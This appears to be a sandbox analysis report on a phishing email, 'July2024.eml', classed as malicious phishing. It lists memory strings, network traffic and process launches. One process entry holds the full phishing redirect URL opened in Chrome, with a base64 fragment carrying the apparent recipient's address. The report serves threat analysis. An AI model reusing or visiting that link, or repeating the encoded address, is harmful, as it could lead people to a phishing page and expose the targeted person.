Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://make.powerautomate.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://management.azure.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://management.azure.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://messagebroker.mobile.m365.svc.cloud.microsoft
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://messaging.office.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://officeapps.live.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://officepyservice.office.net/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://officepyservice.office.net/service.functionality
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://onedrive.live.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://otelrules.svc.static.microsoft
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://outlook.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://outlook.office.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://outlook.office365.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://outlook.office365.com/connectors
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://pushchannel.1drv.ms
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://res.cdn.office.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://res.cdn.office.net/polymer/models
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://service.officepy.microsoftusercontent.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://service.powerapps.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://settings.outlook.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://substrate.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: July2024.eml	String found in binary or memory: https://support.docusign.com/articles/How-do-I-sign-a-DocuSign-document-Ba=
Source: ~WRS{36F80BB7-642B-4BA9-8822-A4A1F086C932}.tmp.0.dr	String found in binary or memory: https://support.docusign.com/articles/How-do-I-sign-a-DocuSign-document-Basic-Signing
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://tasks.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://templatesmetadata.office.net/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashx
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: July2024.eml, ~WRS{36F80BB7-642B-4BA9-8822-A4A1F086C932}.tmp.0.dr	String found in binary or memory: https://www.docusign.com/features-and-benefits/mobile
Source: July2024.eml	String found in binary or memory: https://www.docusign.com/suppo=
Source: ~WRS{36F80BB7-642B-4BA9-8822-A4A1F086C932}.tmp.0.dr	String found in binary or memory: https://www.docusign.com/support
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://www.yammer.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 40.126.32.74:443 -> 192.168.2.17:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.74:443 -> 192.168.2.17:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49751 version: TLS 1.2

Source: classification engine

Classification label: mal84.phis.winEML@23/71@26/12

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240709T1451440409-2292.etl

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\July2024.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "1A1395ED-3156-4398-B273-55E4A51E07DB" "BAE520AC-A7C2-4C6E-B75C-6411EC74864F" "2292" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://linkprotect.cudasvc.com/url?a=trk.klclick3.com%2fls%2fclick%3fupn%3du001.dtwVv1Ru50yD1xohsam-2FjGUphIs0dx6BEFCnPUKnDVd8WxxN6ke5PrYREmrbc2FaACBkT2P6I04Err05g1V2G-2FLWFbGytRFzYyHXDtGMPXvgKpTkM4PAsDhkmIIVHb75Z95k7dO9towCf1JeVC0-2BltHIRoei9lcL45PoMfUZg58-3Dh2f-_exTV-2B0nr75-2FAh2SIjRnOxD8JLIRVpQeWRH3nYFKkscxLUYDZn2KtraB9INOvu-2FWzVBLxft0V1cd3MxM8ltrigbptEVCIy4WvDfcq3o-2F1k9y8xxEh-2BmskMqWS1cAI0cUyybGysibzx60BajiblorrgTAih5eI-2FeIKWcpJ7y5D-2BfNj4kkwASBztE4Llx3YbAa3eGKg8vYsy69633-2Bs7KvPlQGtF3LlYx8tlvzy3u75ylBi1w7Tw6ZQ9q7Gw-2B4SvOdnV3-2FGM7WkcnHVnD74QIHFr87Q9bzLB7aV09brNp-2FGGlceXCU-2BCwap3JWTFzuYoGojteFQ6cZ-2BeKHASwrbaJ0fCeoOb5V9VXY51l9YVHkIcBH6wmagxtNtSJCYMzdyhhrMeVanCoqORb9EWLo04ONXAGlz2DKVGTIZnWm-2BTIagNPs4eFWbG1RY3zOOaFl-2BixPuWMrjPD7ymstCwPGDTI8xH7pdc0bOCntvjSd-2FKIIH1AE-3D&c=E,1,i0-TZ9sXrOnWu3n01gckjTjDlt13jbiHHHyOen1ztoOXCOTRFajJR67WUUfxHg4eD2yKNuMiH6kNQH7GWwT9vqakPcW-Xjgx6yxMACB_jKbE1i_F&typo=1\#Y2hpZ2xleUBsaXZlLXF1aW5uLmNvbQ==
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1924,i,5457991484249521891,2972132230705324861,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "1A1395ED-3156-4398-B273-55E4A51E07DB" "BAE520AC-A7C2-4C6E-B75C-6411EC74864F" "2292" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument 